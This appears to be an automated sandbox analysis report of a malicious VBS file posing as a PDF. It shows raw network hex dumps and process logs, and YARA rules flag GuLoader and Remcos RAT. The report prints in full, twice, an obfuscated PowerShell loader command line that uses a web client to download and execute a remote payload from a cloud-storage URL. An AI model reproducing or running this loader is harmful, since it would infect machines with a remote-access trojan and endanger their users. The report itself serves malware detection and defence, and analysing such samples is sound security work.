                                                                2025-03-10 19:39:04 UTC1342INData Raw: 4f 69 fa d4 3a 04 13 59 6c 80 db d8 29 e2 e3 4d 9c f1 79 47 b8 9a 27 ec c7 f9 c2 72 11 e7 ca da d9 d1 d1 2c a6 4b 00 a7 5d 5f 5f 6b 7c 2d 32 04 19 b0 98 fe 7b 94 08 cf cb 0b 6f b3 f8 e1 a8 49 d5 d6 0d df 44 ff 68 cb 2d 8a 4a d9 9c 1f 32 c0 41 7c 91 78 f7 92 6d 1f 5b 33 01 99 64 ac 20 ef c2 e5 a4 fb cc 47 cc e6 2e 56 a0 59 5b 9e 5b 0f 00 18 19 96 46 f0 1d 0d 6d 31 77 36 72 98 e8 9c 1a 83 1d 9b 5a fb d8 b5 98 3c 1d 70 42 4f 7d ee bd 17 b1 8e 8f 5a 4d 68 df 08 d7 e8 75 d6 09 02 4d 42 4d 9f 5a b0 06 d5 2b 7d a7 8e c0 12 55 c2 bc 81 e7 81 70 62 62 07 87 2a 12 a0 b8 1a 4f fa d6 d8 12 0c ca 5e ed 06 93 56 ea 97 3e a4 a3 74 77 10 cd 22 94 67 13 5c 72 eb 3b 7d 4e 92 5d 57 2c 6a e0 e9 ba 4f 08 49 a1 2c 95 5b b3 17 4c 30 e7 57 3f 24 12 5b 1c ac 2a 06 06 39 54 e1 9e
                                                                Data Ascii: Oi:Yl)MyG'r,K]__k|-2{oIDh-J2A|xm[3d G.VY[[Fm1w6rZ<pBO}ZMhuMBMZ+}Upbb*O^V>tw"g\r;}N]W,jOI,[L0W?$[*9T
                                                                2025-03-10 19:39:04 UTC1342INData Raw: e2 44 c2 12 b1 1d 01 7e 00 6f 1d 19 80 a3 31 66 7d 68 84 52 f5 15 0c a5 52 9f 2b 5c 3f 83 a9 e0 70 e3 7b cd b6 af 44 7b 22 bb 37 de 9e a7 09 90 22 19 21 9d 27 a8 a5 e4 4b da 2a 42 fa b7 9b 25 58 2e fc f9 4d 81 94 7d 8a 1f 2b 2f 9f 05 d8 c0 81 ce 7b 31 e1 82 d3 a9 e4 fb 3b b7 14 2a e0 7a f4 25 58 7d d5 5e 9f a4 6b 74 81 06 db 03 9f 7b 69 16 75 c5 80 ab 2e 65 3d 33 79 dd 50 ff c7 07 bb 83 c3 40 42 3a 7d 28 a6 77 a7 6c 9a e9 6e 48 59 ad c1 32 95 9d ad 57 72 3b 65 77 86 cb 89 d7 b4 cf 12 69 b5 c6 11 a1 21 51 45 2b ed 4b f2 10 90 de 2c 19 b3 60 fc 70 ab 28 b2 6f f9 44 ea 83 f6 8b ee b3 d3 0e ed 12 e6 ac 57 4b 4b 7a 56 b1 49 0e 1e 17 93 19 df 8d b0 f1 d9 60 69 78 2c 5f b2 12 74 6b 21 76 24 1a 24 9e d8 1d 54 3d d0 f4 db e9 db 88 e9 c1 51 00 49 cb a1 d4 0d e0 87
                                                                Data Ascii: D~o1f}hRR+\?p{D{"7"!'K*B%X.M}+/{1;*z%X}^kt{iu.e=3yP@B:}(wlnHY2Wr;ewi!QE+K,`p(oDWKKzVI`ix,_tk!v$$T=QI
                                                                2025-03-10 19:39:04 UTC1342INData Raw: 51 11 dd ba 19 63 72 bd 7e 36 47 c7 d8 32 dd ab 01 6f 60 df ef 3f 16 00 ad ae 1c 81 59 ec bf 02 09 ea 47 64 bf 1a f0 df b0 44 71 fe 74 64 6c 33 51 a5 5d b5 c6 72 d6 70 02 b0 11 76 32 85 67 e0 d1 f2 61 12 4d b0 67 b3 d5 cd 49 65 96 6a 6e 55 fd 46 20 26 f4 00 55 ed 33 e5 26 7f d5 97 cd 87 3a f8 20 9c 84 08 51 81 79 cc 47 2b db ad 44 97 61 ab 82 6b 50 70 1f a2 ff 94 85 39 8d 3e 18 ad a6 3d 2b 8e b8 c0 55 97 82 0b 38 45 05 81 f2 64 ec ad 73 02 45 1e 38 ed 21 9a 44 eb d1 e7 47 e3 e7 0b e7 56 4e 22 81 b8 ef d4 b9 1a cb 1e ba 89 e1 85 83 c4 e5 5e 18 5b be 60 17 77 d6 b4 5a b3 16 31 fe 0d 0d 5a ef 9a fd a2 54 22 ba d8 4e 98 03 30 e8 c9 a3 aa a8 29 4a 95 41 09 16 ea b6 56 83 98 a6 3d 52 ec 0c ad c4 24 6e 80 ef fe be 2f d6 a7 d4 d8 99 71 38 bc 0e e2 77 c7 82 fe 78
                                                                Data Ascii: Qcr~6G2o`?YGdDqtdl3Q]rpv2gaMgIejnUF &U3&: QyG+DakPp9>=+U8EdsE8!DGVN"^[`wZ1ZT"N0)JAV=R$n/q8wx
                                                                2025-03-10 19:39:04 UTC1342INData Raw: ad 9c 69 18 ef f6 55 d4 b6 26 2e 6e 34 3f c7 5f c8 0d 5f 2a 20 9b b1 94 b1 20 f6 85 e5 36 73 f2 4f a8 3e 3e 2d 4e 13 3a 42 56 5a d9 21 4c 36 c0 1b 1d 79 cd 5c 99 b2 37 2c 2b 87 5d e9 62 8a cd 10 2e 39 ac 24 5c ec 8a d5 8f 8b 63 ab ad 5e 70 b7 ce cc c1 f0 cf 7c cf cb 0b 6f a5 28 1e 57 9d f1 3d 1d 37 1c 9e 4f 6b e7 c6 86 2f 99 af 15 b2 33 0b 30 dc 83 9f 5c 15 ac cc 0f f8 4c d0 bb 34 2e 84 3f 51 65 41 b0 93 9c 8d 4b e6 8e 30 fc f0 65 7e 21 97 46 85 89 62 f1 43 ce e7 74 2c 32 2f b5 e6 19 77 bd 8f 9a 68 c0 7a 35 70 55 2a 3e df aa 66 3d 16 71 21 72 8f 71 cd 29 17 f8 54 3f b2 86 36 c9 a4 86 c6 b5 7c f2 16 b0 fa f0 12 bd d1 bc 81 51 e4 56 8e 16 37 dc 22 32 b0 9c 68 3d 49 e5 0c 25 6d 7a c1 f9 fb 2c 00 4e b2 ce de 93 87 b0 ef 58 50 e6 1b c9 fb 00 47 f7 82 3a a2 80
                                                                Data Ascii: iU&.n4?__* 6sO>>-N:BVZ!L6y\7,+]b.9$\c^p|o(W=7Ok/30\L4.?QeAK0e~!FbCt,2/whz5pU*>f=q!rq)T?6|QV7"2h=I%mz,NXPG:


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:15:37:35
                                                                Start date:10/03/2025
                                                                Path:C:\Windows\System32\wscript.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document BT24#U00b7pdf.vbs"
                                                                Imagebase:0x7ff73b930000
                                                                File size:170'496 bytes
                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:1
                                                                Start time:15:37:36
                                                                Start date:10/03/2025
                                                                Path:C:\Windows\System32\PING.EXE
                                                                Wow64 process (32bit):false
                                                                Commandline:ping Host_6637.6637.6637.657e
                                                                Imagebase:0x7ff79bcd0000
                                                                File size:22'528 bytes
                                                                MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:15:37:36
                                                                Start date:10/03/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7e2000000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:3
                                                                Start time:15:37:36
                                                                Start date:10/03/2025
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $elselskaber;function Xanthorrhiza($Diagnostikkernes){ .($Optimalvaerdi) ($Diagnostikkernes)} function raspite($Ambivalentes){$smaabarnsalderen=4;do{$Summker+=$Ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$Skaberaktapirer=Format-List} until(!$Ambivalentes[$smaabarnsalderen])$Summker}$Spaltedefinitionen=raspite ' ndnHjlpeM thtThra.Lesiw';$Spaltedefinitionen+=raspite 'MasteB,reb Di CTeralSl gIAssieBeh,N irT';$Choremen=raspite 'ro fM ForoSa,izGagsiMpanlUnc lAnt aDeme/';$Polytungstate=raspite 'SaniTGogolStifs Agu1 Afs2';$Hematohidrosis='Inve[No.nNSlutE Rabt K l.AnthSUnexE,essrQuinVMilliTolacMillEStraPTridO PeriContNOpsuT UdvMOm,iA s lNOrgaa B,rgBeg,eStemrKa,e]F,rf:Duch:H.poS HijePh,ecUdfruSnekRProtiIncoT.arayBuckpFlotrSky oVoltTKo goFor cTriao ortlWar =taag$StatP puno griLNeu YEmpeTGoo UOec NSmregTills ShatSv daOvertPrope';$Choremen+=raspite 'Rets5Lede.De i0 enc Doe(AttaW AngiCompn ynkdOp roV.trwFangs Spr S.riNDioxTfaca Misa1T ta0Cruc.Dile0Hjem;Genl UnpeWVulgiNedknRadi6Tilb4Bybu;Sp l K igx nap6Graf4Mu t; Ndt FrorMontvSkib:T mm1Past3 Den4 trl.Unmo0Fal )A la ForsG KnaeMigrcOophkGer,oFjl./Ar.e2Unr 0 V n1Zair0Peri0Skab1benz0Phys1Ran PleFClasi mstrFlaweSeksfuopdo allxPala/du,n1 .nt3Hjul4Rall.Gibb0';$Gyldigheder=raspite 'FormuSociSPo aEKibbRInst-Hr,eANobigExtrEFordnBi eT';$Reaccepted=raspite 'OpdrhPaaktUordt E,cp ActsPort:B,ro/Vldi/ la,dUdsor C.ciUdvivIntae Sid.Car g dskoRag o Th gFeeblP eseUdpa.Outwc emeoSnnemB se/Omn,u ankc Unq?muskeSignx I,rp ormoa rer Bo tK rn=.dspdHensot,ylw DatnSavnlPolyoKonta.occdPree& BigiNajad Gru=B rn1 For2VedlO AmaPIndf5Sho.AS ymsLodnIBathYSdceXTemae.abrKUndeOHairNTes 8 SniaAga z,fveVvend9U peDOlivtM ttsOv r0DomfsUndlJtranh SpijHypnUBo lxOrthJTappTLrlisterrm';$Genette=raspite 'Loph>';$Optimalvaerdi=raspite 'ForuI D neChlox';$Trafikkens='Amfibietanken';$Unphilosophize47='\Unapplauding.Ove';Xanthorrhiza (raspite 'Stre$ fsGBomblem.go Kr,b ranaNdteLKut :minyGstumRRatioBrevwKapaLHp te ondDDiff9Af,j6 Myl=G.rt$ TilEsku.NDaugv C b:SomnaSlu pCommp ardd FlyABondt ediaSupe+ Exc$SammUStranInt,pNonpH DifIponyL SupOTopus Proo rnepNonsHSa tIDmpezVoliE chl4Kerm7');Xanthorrhiza (raspite 'udst$ FjeG,hriL IngO AfsB OstaRisplfrdi:BerbeShusr EctyDrontBimah MesrGeneOSpatCMascYT avT ompe Vi SBrdd=,ors$ProbR ForE Sala UndCBag CReveEAmorPHysttautoETuscDSond.SolosAllePReboLGl sibakkTStik(Foot$ kidgBirtEAvilNClube SpatrepatRepuE Coq)');Xanthorrhiza (raspite $Hematohidrosis);$Reaccepted=$Erythrocytes[0];$Beregningsgrundlag=(raspite 'Helb$turiGPi gL keno GriBMaxiaAbmhlRegn:,peckHe dNS goino dPStallNonsiUnsin VirGUnansKabekPreljFritoPa.tl,xfoeLysonInddS Fin=Ki,bnWeaseSalvW Lnk-Quo,O bumBs.spJ,rbaeLodgcGiggT Doo SunfSBrouY recs hawtFlukePartMInv,.Poly$C,mpSDobbpStopa ngalKataTSlamEHemodTromeantifJumbi MetnEgadIKl.mtprovIMalmoVrdin CigEUn rn');Xanthorrhiza ($Beregningsgrundlag);Xanthorrhiza (raspite 'S bi$ ValKGen,nUndeiBollpPatrl MiriHivensupegUnl,sCombk.ealjFuksoStill Hipe ammnGuldsYrt . ilsH weeReacaKvardExoreInddr acosUd n[Syda$fjerGPersyelsalSe edSponiGr ngKorth egneVided nsee uldrBest] Una=over$Top CLambhBogsoChorr MireAilumDa aeSpekn');$Karaffelen=raspite 'gene$CyklKDatanHumoipr.spUrcel ConiBearn Se.gTv,nsReprkS iajForkoSko,lTe teTempnKvarstids.SlagDStimoOli wSkran ontlOligoArtiaU,gedIntwF TariSupel Fa eObs (Shel$XiphRU reeTil,aD bocDdnic LivebutnpHimmt DiveUnhod R.v, Kal$.aleM DiteTranrcre kgrunaNonbn BantTrani TrilSa eiForbsB lle GatrEx eiTrann ShagombyePopurBygms mph)';$Merkantiliseringers=$Growled96;Xanthorrhiza (raspite 'Opp,$FinaGHi,llcrawO TriB h saBiblLtri :gra rChikikrantHef,UKat,aGrinl.estI f isfearETestrobe e P.c=Gr e(Pil.TPr dE .pfs soctisod-CadepBoykASievtPsych Pro Vibr$O,maMSympe PlaRUns k I tA Co N AuktNon.iKaprlT.rnIStenScockeEkspRPos,i .itnParkgbad eOnobRPl tsHjre)');while (!$Ritualisere) {Xanthorrhiza (raspite ' Ta $Resig MaclS.rfo.lotbAppraNrdelKnu,: epoKBlijaBlenrPoacaAuthvLandaOch nNardeart rDeth=Etym$flatHP.rtu PanmHaggaG nsnHr cicirko storU.dea') ;Xanthorrhiza $Karaffelen;Xanthorrhiza (raspite 'Effe[bralTErhvH RidrCoene Ga.aprecd PerIA ernGemiG Dum. drTVerdh OutRBevaeSystAPublDPhth]Timo:Cha : AdosSymjLUnvoEUddee ngPTili(Udfo4Bo.c0.est0Anti0Halv)');Xanthorrhiza (raspite ' U d$ esgBri.L EleOLunhB T,oAHaleLD ab:As eRSubciForbTFjeluElb.AUnliLConvIforbS G,nefor.rRo,ee,ran=Inte(Hot,tPeneELaans Alktlupa- romPK meAGenkTPolyhP um Rade$MaddmBadeEProsrHa pkD apaslagNPeratsiveIBal.lyaw IUngpsUdsgeSoutr inei irkn GasgMellESa mRFugtscomm)') ;Xanthorrhiza (raspite 'Samm$ DrvGN ctlH aloScioBCasta verLRibo:FordlTrisYS.reSBumsaCo vA AfkRL njeScatN.yheeLind=Indp$N,rmgYam lEm lOBedrbP,icAFor,LTy.i:Tan EArtirBrasSR prtLastA Ur TCoupn MeniPopunCacaGFr.nSTottVH lvA nadNvirgdCynoEDeset NonS oru+Borg+Run.% Sej$MyceE nterCaumyRun,tSo,rhShasRSemioCoueC BoryFullT tapESlagSWe,d.SleeCSn roCompUResan arnT') ;$Reaccepted=$Erythrocytes[$Lysaarene]}$Svingfjer=356763;$Gastroenterocolostomy=30418;Xanthorrhiza (raspite 'triu$ApotGFootLFlyvOSiftbUnthaTykmLCate:AcoebAer OHulvB DefEOpkosRobet H py etrRTvanefje RAr enForaeTe tsKali penu= Iri TrangVel eAmalTAlth- RhuCS.ooOph enethnt orseBillNReleTCa a Ps u$CampmUnnaEDe,irDisakSacraFinaNTintTF eri,nopLkrani remSHeavEcoilrDetaiPredn.olkGFor ETts.RDkvas');Xanthorrhiza (raspite 'Tran$T.legDek lGodkoJymobBondaT pal Skr:StemUBor nRetspK llrgaa o UtavB,rbeFrerrdemobDenaiInteaMandlCo,tlOut yFjsi2Non 4Nonp Abra=Ca.a Lo,o[ BurSBestyPachs UdktFolkeKikkmT.sp.FileCSnowoKlatnRkesvTerteFo.orAfprt d m]Kart:unde: DamFSworrSupeoOpremS.riB Bu a HoesSie eBorg6Diss4Hym S tratungarBelliAl entragg yvi(Arbe$BegrBF ntokopubIm,re Subs D,ltus nyHkker eleeDatarUnd.n ,kse alasK an)');Xanthorrhiza (raspite 'Pasn$AfprGCro l ingoMarkbWolfALongL Ml : U oScurtK CabEAmphPWofuTOps.iTrojkDysteFyl rHypeNTorpEDess Fors=Ophi Per[ Kurs G ay Tr.SDr.rT AudEIntrmRati.HammTOv rEPantXKnhaT re.Ato.E ResNSelec Va,oSkemD I li Pern.estGNedf]P as:Unep:KanaaUmensForsCD.sqiCoffiefte.C nvG F,rE oenTProts kedtContrKnsrICen N tarGSpad(Sulp$S laU I dnUnd pRe,erEag o,erkVMilleGrdaRDinnBPaasiLannA SceLProsLB.gbY eun2Tank4Disk)');Xanthorrhiza (raspite ' Ban$overGMassLKrydoOverbTentaFil LHo.e:CaecaCampNSammAVikaRKoldIDestTUds H tedICentALune=Vivi$genssForsk Lare GylpEtnoTAl mIMausK,ulkeSuper ejnDespEHol .LedvsArgyU fa.bCoe.SKeysTAntiRvelmIN nfn runG ede( Jig$Thu sHamaVNontIFr bnforhGT.arfBan JToole SmerEury,Bet $D.vig uezabeshs ettt,iderHi toSterE D unCairT TvieDiodrUdvaoHeteC ForoKontL Ta.OBoykS enTFodrO GulM P eYPast)');Xanthorrhiza $anarithia;"
                                                                Imagebase:0x7ff7785e0000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.1582725505.0000026D10302000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:15:37:36
                                                                Start date:10/03/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7e2000000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:8
                                                                Start time:15:37:59
                                                                Start date:10/03/2025
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $elselskaber;function Xanthorrhiza($Diagnostikkernes){ .($Optimalvaerdi) ($Diagnostikkernes)} function raspite($Ambivalentes){$smaabarnsalderen=4;do{$Summker+=$Ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$Skaberaktapirer=Format-List} until(!$Ambivalentes[$smaabarnsalderen])$Summker}$Spaltedefinitionen=raspite ' ndnHjlpeM thtThra.Lesiw';$Spaltedefinitionen+=raspite 'MasteB,reb Di CTeralSl gIAssieBeh,N irT';$Choremen=raspite 'ro fM ForoSa,izGagsiMpanlUnc lAnt aDeme/';$Polytungstate=raspite 'SaniTGogolStifs Agu1 Afs2';$Hematohidrosis='Inve[No.nNSlutE Rabt K l.AnthSUnexE,essrQuinVMilliTolacMillEStraPTridO PeriContNOpsuT UdvMOm,iA s lNOrgaa B,rgBeg,eStemrKa,e]F,rf:Duch:H.poS HijePh,ecUdfruSnekRProtiIncoT.arayBuckpFlotrSky oVoltTKo goFor cTriao ortlWar =taag$StatP puno griLNeu YEmpeTGoo UOec NSmregTills ShatSv daOvertPrope';$Choremen+=raspite 'Rets5Lede.De i0 enc Doe(AttaW AngiCompn ynkdOp roV.trwFangs Spr S.riNDioxTfaca Misa1T ta0Cruc.Dile0Hjem;Genl UnpeWVulgiNedknRadi6Tilb4Bybu;Sp l K igx nap6Graf4Mu t; Ndt FrorMontvSkib:T mm1Past3 Den4 trl.Unmo0Fal )A la ForsG KnaeMigrcOophkGer,oFjl./Ar.e2Unr 0 V n1Zair0Peri0Skab1benz0Phys1Ran PleFClasi mstrFlaweSeksfuopdo allxPala/du,n1 .nt3Hjul4Rall.Gibb0';$Gyldigheder=raspite 'FormuSociSPo aEKibbRInst-Hr,eANobigExtrEFordnBi eT';$Reaccepted=raspite 'OpdrhPaaktUordt E,cp ActsPort:B,ro/Vldi/ la,dUdsor C.ciUdvivIntae Sid.Car g dskoRag o Th gFeeblP eseUdpa.Outwc emeoSnnemB se/Omn,u ankc Unq?muskeSignx I,rp ormoa rer Bo tK rn=.dspdHensot,ylw DatnSavnlPolyoKonta.occdPree& BigiNajad Gru=B rn1 For2VedlO AmaPIndf5Sho.AS ymsLodnIBathYSdceXTemae.abrKUndeOHairNTes 8 SniaAga z,fveVvend9U peDOlivtM ttsOv r0DomfsUndlJtranh SpijHypnUBo lxOrthJTappTLrlisterrm';$Genette=raspite 'Loph>';$Optimalvaerdi=raspite 'ForuI D neChlox';$Trafikkens='Amfibietanken';$Unphilosophize47='\Unapplauding.Ove';Xanthorrhiza (raspite 'Stre$ fsGBomblem.go Kr,b ranaNdteLKut :minyGstumRRatioBrevwKapaLHp te ondDDiff9Af,j6 Myl=G.rt$ TilEsku.NDaugv C b:SomnaSlu pCommp ardd FlyABondt ediaSupe+ Exc$SammUStranInt,pNonpH DifIponyL SupOTopus Proo rnepNonsHSa tIDmpezVoliE chl4Kerm7');Xanthorrhiza (raspite 'udst$ FjeG,hriL IngO AfsB OstaRisplfrdi:BerbeShusr EctyDrontBimah MesrGeneOSpatCMascYT avT ompe Vi SBrdd=,ors$ProbR ForE Sala UndCBag CReveEAmorPHysttautoETuscDSond.SolosAllePReboLGl sibakkTStik(Foot$ kidgBirtEAvilNClube SpatrepatRepuE Coq)');Xanthorrhiza (raspite $Hematohidrosis);$Reaccepted=$Erythrocytes[0];$Beregningsgrundlag=(raspite 'Helb$turiGPi gL keno GriBMaxiaAbmhlRegn:,peckHe dNS goino dPStallNonsiUnsin VirGUnansKabekPreljFritoPa.tl,xfoeLysonInddS Fin=Ki,bnWeaseSalvW Lnk-Quo,O bumBs.spJ,rbaeLodgcGiggT Doo SunfSBrouY recs hawtFlukePartMInv,.Poly$C,mpSDobbpStopa ngalKataTSlamEHemodTromeantifJumbi MetnEgadIKl.mtprovIMalmoVrdin CigEUn rn');Xanthorrhiza ($Beregningsgrundlag);Xanthorrhiza (raspite 'S bi$ ValKGen,nUndeiBollpPatrl MiriHivensupegUnl,sCombk.ealjFuksoStill Hipe ammnGuldsYrt . ilsH weeReacaKvardExoreInddr acosUd n[Syda$fjerGPersyelsalSe edSponiGr ngKorth egneVided nsee uldrBest] Una=over$Top CLambhBogsoChorr MireAilumDa aeSpekn');$Karaffelen=raspite 'gene$CyklKDatanHumoipr.spUrcel ConiBearn Se.gTv,nsReprkS iajForkoSko,lTe teTempnKvarstids.SlagDStimoOli wSkran ontlOligoArtiaU,gedIntwF TariSupel Fa eObs (Shel$XiphRU reeTil,aD bocDdnic LivebutnpHimmt DiveUnhod R.v, Kal$.aleM DiteTranrcre kgrunaNonbn BantTrani TrilSa eiForbsB lle GatrEx eiTrann ShagombyePopurBygms mph)';$Merkantiliseringers=$Growled96;Xanthorrhiza (raspite 'Opp,$FinaGHi,llcrawO TriB h saBiblLtri :gra rChikikrantHef,UKat,aGrinl.estI f isfearETestrobe e P.c=Gr e(Pil.TPr dE .pfs soctisod-CadepBoykASievtPsych Pro Vibr$O,maMSympe PlaRUns k I tA Co N AuktNon.iKaprlT.rnIStenScockeEkspRPos,i .itnParkgbad eOnobRPl tsHjre)');while (!$Ritualisere) {Xanthorrhiza (raspite ' Ta $Resig MaclS.rfo.lotbAppraNrdelKnu,: epoKBlijaBlenrPoacaAuthvLandaOch nNardeart rDeth=Etym$flatHP.rtu PanmHaggaG nsnHr cicirko storU.dea') ;Xanthorrhiza $Karaffelen;Xanthorrhiza (raspite 'Effe[bralTErhvH RidrCoene Ga.aprecd PerIA ernGemiG Dum. drTVerdh OutRBevaeSystAPublDPhth]Timo:Cha : AdosSymjLUnvoEUddee ngPTili(Udfo4Bo.c0.est0Anti0Halv)');Xanthorrhiza (raspite ' U d$ esgBri.L EleOLunhB T,oAHaleLD ab:As eRSubciForbTFjeluElb.AUnliLConvIforbS G,nefor.rRo,ee,ran=Inte(Hot,tPeneELaans Alktlupa- romPK meAGenkTPolyhP um Rade$MaddmBadeEProsrHa pkD apaslagNPeratsiveIBal.lyaw IUngpsUdsgeSoutr inei irkn GasgMellESa mRFugtscomm)') ;Xanthorrhiza (raspite 'Samm$ DrvGN ctlH aloScioBCasta verLRibo:FordlTrisYS.reSBumsaCo vA AfkRL njeScatN.yheeLind=Indp$N,rmgYam lEm lOBedrbP,icAFor,LTy.i:Tan EArtirBrasSR prtLastA Ur TCoupn MeniPopunCacaGFr.nSTottVH lvA nadNvirgdCynoEDeset NonS oru+Borg+Run.% Sej$MyceE nterCaumyRun,tSo,rhShasRSemioCoueC BoryFullT tapESlagSWe,d.SleeCSn roCompUResan arnT') ;$Reaccepted=$Erythrocytes[$Lysaarene]}$Svingfjer=356763;$Gastroenterocolostomy=30418;Xanthorrhiza (raspite 'triu$ApotGFootLFlyvOSiftbUnthaTykmLCate:AcoebAer OHulvB DefEOpkosRobet H py etrRTvanefje RAr enForaeTe tsKali penu= Iri TrangVel eAmalTAlth- RhuCS.ooOph enethnt orseBillNReleTCa a Ps u$CampmUnnaEDe,irDisakSacraFinaNTintTF eri,nopLkrani remSHeavEcoilrDetaiPredn.olkGFor ETts.RDkvas');Xanthorrhiza (raspite 'Tran$T.legDek lGodkoJymobBondaT pal Skr:StemUBor nRetspK llrgaa o UtavB,rbeFrerrdemobDenaiInteaMandlCo,tlOut yFjsi2Non 4Nonp Abra=Ca.a Lo,o[ BurSBestyPachs UdktFolkeKikkmT.sp.FileCSnowoKlatnRkesvTerteFo.orAfprt d m]Kart:unde: DamFSworrSupeoOpremS.riB Bu a HoesSie eBorg6Diss4Hym S tratungarBelliAl entragg yvi(Arbe$BegrBF ntokopubIm,re Subs D,ltus nyHkker eleeDatarUnd.n ,kse alasK an)');Xanthorrhiza (raspite 'Pasn$AfprGCro l ingoMarkbWolfALongL Ml : U oScurtK CabEAmphPWofuTOps.iTrojkDysteFyl rHypeNTorpEDess Fors=Ophi Per[ Kurs G ay Tr.SDr.rT AudEIntrmRati.HammTOv rEPantXKnhaT re.Ato.E ResNSelec Va,oSkemD I li Pern.estGNedf]P as:Unep:KanaaUmensForsCD.sqiCoffiefte.C nvG F,rE oenTProts kedtContrKnsrICen N tarGSpad(Sulp$S laU I dnUnd pRe,erEag o,erkVMilleGrdaRDinnBPaasiLannA SceLProsLB.gbY eun2Tank4Disk)');Xanthorrhiza (raspite ' Ban$overGMassLKrydoOverbTentaFil LHo.e:CaecaCampNSammAVikaRKoldIDestTUds H tedICentALune=Vivi$genssForsk Lare GylpEtnoTAl mIMausK,ulkeSuper ejnDespEHol .LedvsArgyU fa.bCoe.SKeysTAntiRvelmIN nfn runG ede( Jig$Thu sHamaVNontIFr bnforhGT.arfBan JToole SmerEury,Bet $D.vig uezabeshs ettt,iderHi toSterE D unCairT TvieDiodrUdvaoHeteC ForoKontL Ta.OBoykS enTFodrO GulM P eYPast)');Xanthorrhiza $anarithia;"
                                                                Imagebase:0x580000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000008.00000002.2006537244.0000000008750000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000008.00000002.1971298491.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.2006894025.000000000B775000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:9
                                                                Start time:15:37:59
                                                                Start date:10/03/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7e2000000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:12
                                                                Start time:15:38:41
                                                                Start date:10/03/2025
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                Imagebase:0x430000
                                                                File size:59'904 bytes
                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2222859365.00000000075BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000002.2198489386.0000000005FF5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:16
                                                                Start time:15:39:06
                                                                Start date:10/03/2025
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\msiexec.exe"
                                                                Imagebase:0x430000
                                                                File size:59'904 bytes
